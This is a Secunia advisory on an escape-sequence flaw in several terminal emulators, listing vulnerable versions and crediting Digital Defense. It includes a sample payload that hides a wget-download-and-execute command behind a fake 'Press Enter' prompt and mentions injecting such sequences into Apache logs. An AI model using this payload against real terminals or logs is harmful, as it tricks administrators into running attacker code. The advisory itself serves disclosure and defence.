Secunia

Different terminal emulators have been found vulnerable to an issue allowing malicious people to manipulate actions taken by the system administrator and other users.

The problem is that escape sequences like "\e2]2;" aren't handled correctly. This allows plain text files to manipulate the text shown in the terminal emulator, which could be exploited to show a "harmless" text messages that requires the user to respond by clicking enter. This will then execute commands hidden by the "harmless" text.

Example:
echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

This will ask the user to press enter, while concealing the commands in the background, which could download and execute malicious code.

The vulnerability could be used by local users to trick root or other local users into reading a malicious plain text file using commands like type, more, and tail.

However, remote users may also be able to inject this into log files. It has been reported that it is possible to inject escape sequences into Apache access and error log files. Other daemons may also write unfiltered text to log files.

See the original advisory from Digital Defense for more examples.

Versions confirmed vulnerable:
xterm xf86 4.2.0 (patch 165)
aterm 0.42
rxvt 2.7.8
Eterm 0.9.1
konsole 3.1.0 rc5
putty 0.53
SecureCRT 3.4.6
gnome-terminal 2.0.2 (libzvt 2.0.1) [2.2 indirectly]
hanterm-xf 2.0

Solution
Use a different terminal emulator, until your favorite terminal emulator has been updated.
Further details available in Customer Area

Provided and/or discovered by
H D Moore, Digital Defense

Changelog
Further details available in Customer Area

Original Advisory
http://www.digitaldefense.net/labs/papers/Termulation.txt

Deep Links
Links available in Customer Area